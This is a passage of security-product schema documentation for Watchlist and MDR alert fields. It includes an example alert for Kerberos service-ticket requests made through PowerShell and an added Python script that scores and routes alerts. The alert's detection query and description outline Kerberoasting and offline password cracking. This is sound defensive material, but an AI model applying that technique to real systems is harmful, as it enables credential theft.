ioc_field | The field in which the indicator of compromise (IOC) hit occurred. | String |
ioc_hit | IOC field value or IOC query that matched. | String |
ioc_id | Unique identifier of the IOC that generated the watchlist hit. | String |
ml_classification_final_verdict | Final verdict of the alert, based on the ML models used to make the prediction. Possible values: NOT_CLASSIFIED, NOT_ANOMALOUS, ANOMALOUS | String |
ml_classification_global_prevalence | Category (low/medium/high) describing the prevalence of the alert across all organizations in the region. Possible values: UNKNOWN, LOW, MEDIUM, HIGH | String |
ml_classification_org_prevalence | Category (low/medium/high) describing the prevalence of the alert within the organization. Possible values: UNKNOWN, LOW, MEDIUM, HIGH | String |
report_description | Description of the watchlist report associated with the alert. | String |
report_id | ID of the report that contained the IOC that caused the hit. | String |
report_link | Link of the report that contained the IOC that caused the hit. | String |
report_name | Name of the watchlist report. | String |
report_tags | Tags associated with the watchlist report. | String[] |
ttps | Other potential malicious activities involved in the threat. | String[] |
watchlists | List of watchlists associated with the alert. Alerts are batched hourly. | Object[] |
Example
```json
{
  "version": "2.0.0",
  "org_key": "ABCD1234",
  "alert_url": "https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
  "id": "3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
  "type": "WATCHLIST",
  "is_updated": false,
  "detection_timestamp": "2023-07-17T17:21:13.483Z",
  "backend_timestamp": "2023-07-17T17:21:34.063Z",
  "backend_update_timestamp": "2023-07-17T17:21:34.063Z",
  "first_event_timestamp": "2023-07-17T17:19:00.412Z",
  "last_event_timestamp": "2023-07-17T17:19:00.412Z",
  "severity": 10,
  "reason": "Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
  "threat_id": "CF4E6DE74AA8B188C0346A54FDEA940C",
  "primary_event_id": "VUX7Bu7vTrWwnU8-uSVh1A-0",
  "workflow": {
    "status": "OPEN",
    "change_timestamp": "2023-07-17T17:21:34.063Z",
    "changed_by_type": "SYSTEM",
    "changed_by": "ALERT_CREATION",
    "closure_reason": "NO_REASON"
  },
  "determination": {
    "value": "NONE",
    "change_timestamp": "2023-07-17T17:21:34.063Z"
  },
  "alert_notes_present": false,
  "policy_applied": "NOT_APPLIED",
  "run_state": "RAN",
  "reason_code": "cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
  "sensor_action": "ALLOW",
  "device_target_value": "MEDIUM",
  "device_policy_id": 6525,
  "device_policy": "default",
  "device_id": 5890528,
  "device_name": "ABT102675",
  "device_uem_id": "596B6C4DD49AEF4AB3713363DDBB1F11",
  "device_os": "WINDOWS",
  "device_os_version": "Windows 11 x64",
  "device_username": "DemoMachine",
  "device_location": "UNKNOWN",
  "device_external_ip": "49.206.61.4",
  "device_internal_ip": "192.168.0.104",
  "report_id": "LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
  "report_name": "Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
  "report_description": "Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
  "report_tags": [
    "credentialaccess",
    "t1558",
    "windows",
    "amsi",
    "attack",
    "attackframework"
  ],
  "report_link": "https://attack.mitre.org/techniques/T1558/003/",
  "ioc_id": "b1c1ae83-f66b-4aa3-a496-363e296f4018",
  "ioc_hit": "fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
  "watchlists": [{
    "id": "Ci7w5B4URg6HN60hatQMQ",
    "name": "AMSI Threat Intelligence"
  }],
  "process_guid": "ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
  "process_pid": 13636,
  "process_name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
  "process_sha256": "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
  "process_md5": "0499440c4b0783266183246e384c6657",
  "process_reputation": "TRUSTED_WHITE_LIST",
  "process_effective_reputation": "TRUSTED_WHITE_LIST",
  "process_cmdline": "powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
  "process_username": "NT AUTHORITY\\SYSTEM",
  "process_issuer": ["Microsoft Windows Production PCA 2011"],
  "process_publisher": ["Microsoft Windows"],
  "parent_guid": "ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
  "parent_pid": 10384,
  "parent_name": "c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
  "parent_sha256": "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
  "parent_md5": "c7e583681f0958d4f5d32afd09d8084b",
  "parent_reputation": "NOT_LISTED",
  "parent_effective_reputation": "NOT_LISTED",
  "parent_cmdline": "\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
  "parent_username": "NT AUTHORITY\\SYSTEM",
  "mdr_alert_notes_present": false,
  "mdr_alert": false,
  "ml_classification_final_verdict": "ANOMALOUS",
  "ml_classification_global_prevalence": "MEDIUM",
  "ml_classification_org_prevalence": "LOW"
}
```
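The run_state, sensor_action, device_target_value and *_reputation fields of the Base Alert, the ml_classification_* fields of Watchlist alerts and the ip_reputation score of Container Runtime alerts are the inputs an analyst queue is usually built from. The following Python is an added example, not code from this page or from Carbon Black, that scores and routes alerts from those fields. The weights, thresholds, queue names and the sample alerts (constructed as cut-down versions of the Watchlist, CB Analytics and Container Runtime examples on this page) are this example's assumptions, not vendor guidance.

```python
"""Triage scoring over Data Forwarder alert records, schema 2.0.0.

Added example; not code from the schema page or from Carbon Black. Ranks
alerts for an analyst queue from fields the schema carries on every alert
plus the Watchlist ml_classification_* fields and the Container Runtime
ip_reputation score. Weights, thresholds and queue names are assumptions.
"""

REPUTATION_BAD = {"KNOWN_MALWARE", "SUSPECT_MALWARE", "COMPANY_BLACK_LIST",
                  "PUP", "ADWARE", "HEURISTIC"}
REPUTATION_TRUSTED = {"TRUSTED_WHITE_LIST", "COMPANY_WHITE_LIST", "COMMON_WHITE_LIST",
                      "ADAPTIVE_WHITE_LIST", "LOCAL_WHITE"}
REPUTATION_UNKNOWN = {"NOT_LISTED", "RESOLVING", "NOT_SUPPORTED"}
TARGET_WEIGHT = {"LOW": 0.5, "MEDIUM": 1.0, "HIGH": 1.5, "MISSION_CRITICAL": 2.0}


def ip_reputation_band(score):
    """Bands from the Container Runtime ip_reputation definition (0..100)."""
    if not score:
        return "unknown"
    for upper, band in ((20, "high risk"), (40, "suspicious"), (60, "moderate"),
                        (80, "low risk")):
        if score <= upper:
            return band
    return "trustworthy"


def triage(alert):
    """Return a score, a queue and the reasons that drove the score."""
    score = float(alert.get("severity", 0))
    reasons = []

    # The threat executed and the policy let it: nothing on the endpoint stopped it.
    if alert.get("run_state") == "RAN" and alert.get("sensor_action") == "ALLOW":
        score += 3
        reasons.append("ran and was allowed")
    elif alert.get("sensor_action") in ("DENY", "TERMINATE"):
        score -= 2
        reasons.append(f"sensor action {alert['sensor_action']}")

    # Sensor-time effective reputation of the actor and of its parent.
    actor = alert.get("process_effective_reputation")
    parent = alert.get("parent_effective_reputation")
    if actor in REPUTATION_BAD:
        score += 3
        reasons.append(f"actor reputation {actor}")
    elif actor in REPUTATION_TRUSTED and parent in REPUTATION_UNKNOWN:
        # A trusted binary (powershell.exe in the Watchlist example) launched by a
        # parent nobody has classified is the shape of living-off-the-land activity.
        score += 2
        reasons.append(f"trusted actor under {parent} parent")

    # Watchlist alerts carry the ML verdict and the prevalence in this org.
    if alert.get("ml_classification_final_verdict") == "ANOMALOUS":
        score += 2
        reasons.append("ML verdict ANOMALOUS")
        if alert.get("ml_classification_org_prevalence") == "LOW":
            score += 1
            reasons.append("rare in this org")

    # Container Runtime alerts: public egress to a low-reputation destination.
    if alert.get("type") == "CONTAINER_RUNTIME":
        band = ip_reputation_band(alert.get("ip_reputation"))
        public_egress = (alert.get("connection_type") == "EGRESS"
                         and alert.get("remote_is_private") is False)
        if public_egress and band in ("high risk", "suspicious"):
            score += 3
            reasons.append(f"public egress to {band} IP")
        elif band == "trustworthy":
            score -= 2
            reasons.append("destination IP trustworthy")

    score = round(score * TARGET_WEIGHT.get(alert.get("device_target_value"), 1.0), 1)
    if alert.get("mdr_alert"):
        queue = "mdr"  # already in the managed detection and response workflow
    elif score >= 14:
        queue = "p1"
    elif score >= 8:
        queue = "p2"
    else:
        queue = "p3"
    return {"score": score, "queue": queue, "reasons": reasons}


# Constructed from the Watchlist, CB Analytics and Container Runtime examples above.
SAMPLE_ALERTS = {
    "watchlist": {"type": "WATCHLIST", "severity": 10, "run_state": "RAN",
                  "sensor_action": "ALLOW", "device_target_value": "MEDIUM",
                  "process_effective_reputation": "TRUSTED_WHITE_LIST",
                  "parent_effective_reputation": "NOT_LISTED",
                  "ml_classification_final_verdict": "ANOMALOUS",
                  "ml_classification_org_prevalence": "LOW", "mdr_alert": False},
    "cb_analytics": {"type": "CB_ANALYTICS", "severity": 5, "run_state": "RAN",
                     "sensor_action": "ALLOW", "device_target_value": "MISSION_CRITICAL",
                     "process_effective_reputation": "KNOWN_MALWARE",
                     "parent_effective_reputation": "TRUSTED_WHITE_LIST", "mdr_alert": False},
    "container": {"type": "CONTAINER_RUNTIME", "severity": 5, "run_state": "RAN",
                  "sensor_action": "ALLOW", "device_target_value": "MEDIUM",
                  "process_effective_reputation": "RESOLVING", "connection_type": "EGRESS",
                  "ip_reputation": 96, "remote_is_private": False, "mdr_alert": False},
}
```

With these weights the Watchlist sample scores 18.0 (p1: it ran, was allowed, is a trusted binary under an unlisted parent, and the ML verdict is anomalous and rare in the org), the CB Analytics sample scores 22.0 (p1, doubled by MISSION_CRITICAL) and the Container Runtime sample drops to 6.0 (p3) because its egress went to a trustworthy destination. Using process_effective_reputation rather than process_reputation matters: the former is what the sensor actually enforced at the time, the latter is the cloud's later assessment.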
Managed Detection and Response (MDR) Fields
These fields are included on all alert types for customers who subscribe to the MDR product.
Field Name | Definition | Datatype |
---|---|---|
mdr_alert | Whether the alert is eligible for review by Carbon Black MDR analysts. | Boolean |
mdr_alert_notes_present | True if customer-visible notes added by an MDR analyst are present on the alert. | Boolean |
mdr_determination | MDR-updatable classification of the alert. | Object |
mdr_workflow | MDR-updatable workflow of the alert. | Object |
Last modified on July 23, 2024